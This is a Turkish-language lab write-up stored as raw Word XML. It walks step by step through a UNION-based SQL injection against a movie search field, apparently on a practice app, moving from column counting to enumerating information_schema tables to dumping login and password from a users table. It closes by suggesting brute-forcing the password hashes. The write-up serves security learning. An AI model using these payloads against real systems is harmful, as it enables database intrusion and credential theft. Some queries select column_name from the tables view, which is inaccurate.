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E336" w14:textId="1D208F96" w:rsidR="0072736D" w:rsidRPr="00D7209F" w:rsidRDefault="00DA7994" w:rsidP="00DA7994">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SqliUnion</w:t>
      </w:r>
      <w:r w:rsidR="00771B83" w:rsidRPr="00FD1B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> zafiyeti </w:t>
      </w:r>
      <w:r w:rsidR="00FD1B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Fazla iyi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCC1282" w14:textId="4121D659" w:rsidR="00771B83" w:rsidRDefault="00DA7994" w:rsidP="00DA7994">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Mantıken olay daha basit bir şekilde araştırmayı SQL dilinin yapılandırılmasına bağlanınca bu bağlama şu şekilde gerçekleşiyor;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28F7B0" w14:textId="29D74C24" w:rsidR="00DA7994" w:rsidRDefault="00DA7994" w:rsidP="00DA7994">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM movies WHERE title LIKE ‘%veri%’; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4390C783" w14:textId="3525ADB4" w:rsidR="00DA7994" w:rsidRDefault="00DA7994" w:rsidP="00DA7994">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ustteki movies o bolumun tablosu ve title da gönderilme şekli denebilir burada değişken yer ise bizim girdiğimiz verinin gittği (veri) alanı buraya istenirse;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0185B2C1" w14:textId="4B6C2479" w:rsidR="00DA7994" w:rsidRDefault="00DA7994" w:rsidP="005A6E5A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA7994">
        <w:t>SELECT * FROM movies WHERE title LIKE ‘%</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>man’ ORDER BY 7#%</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7994">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00607716">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC001F0" w14:textId="77777777" w:rsidR="005A6E5A" w:rsidRDefault="009F7E05" w:rsidP="005A6E5A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F60B361" wp14:editId="134F5401">
            <wp:extent cx="5760720" cy="12426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CE5" w14:textId="283D765E" w:rsidR="009F7E05" w:rsidRDefault="005A6E5A" w:rsidP="00DA7994">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>(Doğru çıktığı için geçtik yoksa tek tek denemeli ve kaç sutunlu olduğu görülmelidir.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1153EC66" w14:textId="1944ABED" w:rsidR="00DA7994" w:rsidRDefault="00DA7994" w:rsidP="00DA7994">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Şeklinde yazılabilir burda yazılan şey mavi olarak verilmiştir. Mantığı ise şudur ki man olan yazıları SQL’de ararken bir de boyutunun kaç olduğu sorulur.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Bundan sonra boyutunu bulduğumuzda butun dosyalar (information_schema) dosyasının içinde olduğundan alttaki komutla ilk shemalar öğrenilebilir;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A845D8A" w14:textId="2B18FFFC" w:rsidR="00DA7994" w:rsidRDefault="00DA7994" w:rsidP="00DA7994">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7994">
        <w:t>SELECT * FROM movies WHERE title LIKE ’%</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>man’ UNION SELECT 1,table_name,3,4,5,6,7 FROM information_schema.tables WHERE table_schema=database()</w:t>
      </w:r>
      <w:r w:rsidR="00BD7EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00060B78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>%’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79213B96" w14:textId="65EA4D42" w:rsidR="00B30C72" w:rsidRDefault="00B30C72" w:rsidP="00DA7994">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68A2D7EF" wp14:editId="510D7F92">
            <wp:extent cx="5760720" cy="15855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DF8" w14:textId="77777777" w:rsidR="00BD7EF7" w:rsidRDefault="00DA7994" w:rsidP="00BD7EF7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Üstteki gibi yazıldığında butun tablolar girilecektir bundan sonra bilinen ve istenen veriye ulaşmak için sırasıyla gösterim yapılır ve dosyalardan en doğru olanı bulunur burada “users” dosyasını bulmaya çalışıp şifreleri görüyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C87DF84" w14:textId="77777777" w:rsidR="00DC01EF" w:rsidRDefault="00DC01EF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A7DBCF" w14:textId="544F2D40" w:rsidR="00BD7EF7" w:rsidRDefault="00BD7EF7" w:rsidP="00BD7EF7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.  | Dosyanın sutunlarını yazdırdık.|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A851FB9" w14:textId="77777777" w:rsidR="00176C85" w:rsidRPr="00BD7EF7" w:rsidRDefault="00BD7EF7" w:rsidP="00176C85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7994">
        <w:t>SELECT * FROM movies WHERE title LIKE ’%</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>man’ UNION SELECT 1,table_name,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>,4,5,6,7 FROM information_schema.tables WHERE table_schema=database()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="00060B78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>%’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7B393A" w14:textId="00C12D20" w:rsidR="00DC01EF" w:rsidRDefault="00DC01EF" w:rsidP="007A7DE1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DECCE10" wp14:editId="70EC64A1">
            <wp:extent cx="5760720" cy="25247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60E" w14:textId="410CFE0E" w:rsidR="00176C85" w:rsidRDefault="00176C85" w:rsidP="00176C85">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.  | Dosyanın users alanını yazdırdık.|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599B0341" w14:textId="5D2440AB" w:rsidR="00176C85" w:rsidRDefault="00176C85" w:rsidP="00176C85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7994">
        <w:t>SELECT * FROM movies WHERE title LIKE ’%</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>man’ UNION SELECT 1,table_name,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>,4,5,6,7 FROM information_schema.tables WHERE table_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>name=’users’ #%’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1D696" w14:textId="1A64E356" w:rsidR="00DC01EF" w:rsidRPr="00BD7EF7" w:rsidRDefault="00DC01EF" w:rsidP="007A7DE1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B721909" wp14:editId="37D592A3">
            <wp:extent cx="5760720" cy="33331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1A9" w14:textId="77777777" w:rsidR="001B5A4B" w:rsidRDefault="001B5A4B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD8A7EF" w14:textId="49234D19" w:rsidR="00176C85" w:rsidRDefault="00176C85" w:rsidP="00176C85">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.  |</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Son olarak tablodan kullanıcı adı(login) ve şifreyi (password) aldık </w:t>
      </w:r>
      <w:r>
        <w:t>.|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AF5510" w14:textId="1EC0F05B" w:rsidR="00176C85" w:rsidRDefault="00176C85" w:rsidP="00176C85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA7994">
        <w:t>SELECT * FROM movies WHERE title LIKE ’%</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>man’ UNION SELECT 1,</w:t>
      </w:r>
      <w:r w:rsidR="000A1F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000A1F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">,4,5,6,7 FROM </w:t>
      </w:r>
      <w:r w:rsidR="00C96550">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>users#%’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B62A84" w14:textId="4785A987" w:rsidR="00DA7994" w:rsidRPr="000E421B" w:rsidRDefault="00B92FB6" w:rsidP="00176C85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E421B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu yaptıklarımızdan sonra gelen bir şifreli </w:t>
      </w:r>
      <w:r w:rsidR="000E421B" w:rsidRPr="000E421B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>şifreyi bozmak için farklı yöntemlerle brute force yaparak halletmek olabildiğince kolay bir yontemdir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB54EED" w14:textId="5440D4A0" w:rsidR="00DA7994" w:rsidRDefault="000E421B" w:rsidP="00DA7994">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5629F08A" wp14:editId="6ED5F161">
            <wp:extent cx="5760720" cy="1857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1E1" w14:textId="77777777" w:rsidR="00DA7994" w:rsidRPr="00DA7994" w:rsidRDefault="00DA7994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00DA7994" w:rsidRPr="00DA7994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1158B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7DB64A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1"/>
    <w:rsid w:val="00053BD2"/>
    <w:rsid w:val="00060B78"/>
    <w:rsid w:val="000A1F6D"/>
    <w:rsid w:val="000E421B"/>
    <w:rsid w:val="00176C85"/>
    <w:rsid w:val="00194BCB"/>
    <w:rsid w:val="001B51E9"/>
    <w:rsid w:val="001B5A4B"/>
    <w:rsid w:val="002F582A"/>
    <w:rsid w:val="003D1F26"/>
    <w:rsid w:val="004B3DF2"/>
    <w:rsid w:val="004C0595"/>
    <w:rsid w:val="004E103D"/>
    <w:rsid w:val="004F4CC7"/>
    <w:rsid w:val="005A6E5A"/>
    <w:rsid w:val="005D27E1"/>
    <w:rsid w:val="00607716"/>
    <w:rsid w:val="00627E76"/>
    <w:rsid w:val="0072736D"/>
    <w:rsid w:val="00743C5E"/>
    <w:rsid w:val="00771A15"/>
    <w:rsid w:val="00771B83"/>
    <w:rsid w:val="007A7DE1"/>
    <w:rsid w:val="00857C66"/>
    <w:rsid w:val="008C294B"/>
    <w:rsid w:val="009F7E05"/>
    <w:rsid w:val="00B30C72"/>
    <w:rsid w:val="00B92FB6"/>
    <w:rsid w:val="00BD3202"/>
    <w:rsid w:val="00BD7EF7"/>
    <w:rsid w:val="00C72B9F"/>
    <w:rsid w:val="00C96550"/>
    <w:rsid w:val="00CB1300"/>
    <w:rsid w:val="00D7209F"/>
    <w:rsid w:val="00DA7994"/>
    <w:rsid w:val="00DC01EF"/>
    <w:rsid w:val="00E02C82"/>
    <w:rsid w:val="00E660A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A79"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F94A47C9-9021-4A54-9059-AC009E9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28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-05T13:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-05T16:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>